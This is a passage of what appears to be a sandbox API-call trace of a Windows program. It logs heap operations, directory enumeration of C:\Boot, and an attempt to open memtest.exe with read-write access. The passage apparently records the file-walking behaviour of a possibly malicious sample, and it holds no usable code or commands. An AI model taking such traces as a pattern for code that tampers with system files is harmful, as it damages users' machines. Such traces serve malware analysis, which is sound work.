1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d20 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.676] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3216cb0 | out: hHeap=0x6e0000) returned 1 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.677] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ead3730, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ead3730, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa8) returned 0x31e15a8 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d20 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d48 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cf8 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240910 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f3c98 | out: hHeap=0x6e0000) returned 1 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.677] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.677] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.677] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.677] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xfc) returned 0x3201db8 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cf8 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d48 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a00 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409d8 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409b0 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d20 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d70 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240910 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31e15a8 | out: hHeap=0x6e0000) returned 1 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.678] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb1f9f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb1f9f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.678] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.678] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb45b50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb45b50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.678] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.679] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x16c) returned 0x73bec0 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d70 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d20 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240848 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32407f8 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240870 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240898 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c58 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cf8 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d48 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a00 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409d8 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240910 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3201db8 | out: hHeap=0x6e0000) returned 1 [0146.679] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.679] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.679] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb6bcb0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb6bcb0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.680] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.680] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.680] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.680] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e628 [0146.680] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.680] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0146.680] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e628 | out: hHeap=0x6e0000) returned 1 [0146.681] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x214) returned 0x32428c8 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409b0 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409d8 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a00 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240d48 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cf8 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c30 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240de8 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240dc0 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240aa0 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240988 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240938 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b90 [0146.681] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240bb8 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d70 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240d20 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240848 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32407f8 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240870 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240898 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ac8 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c58 | out: hHeap=0x6e0000) returned 1 [0146.681] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240c80 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240910 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240780 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x73bec0 | out: hHeap=0x6e0000) returned 1 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240780 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.682] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240910 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.682] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c80 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.682] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.682] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.682] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.682] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240c58 [0146.683] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.683] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.683] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240cd0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240af0 [0146.683] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ac8 [0146.683] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240af0 | out: hHeap=0x6e0000) returned 1 [0146.683] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240cd0 | out: hHeap=0x6e0000) returned 1 [0146.683] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: 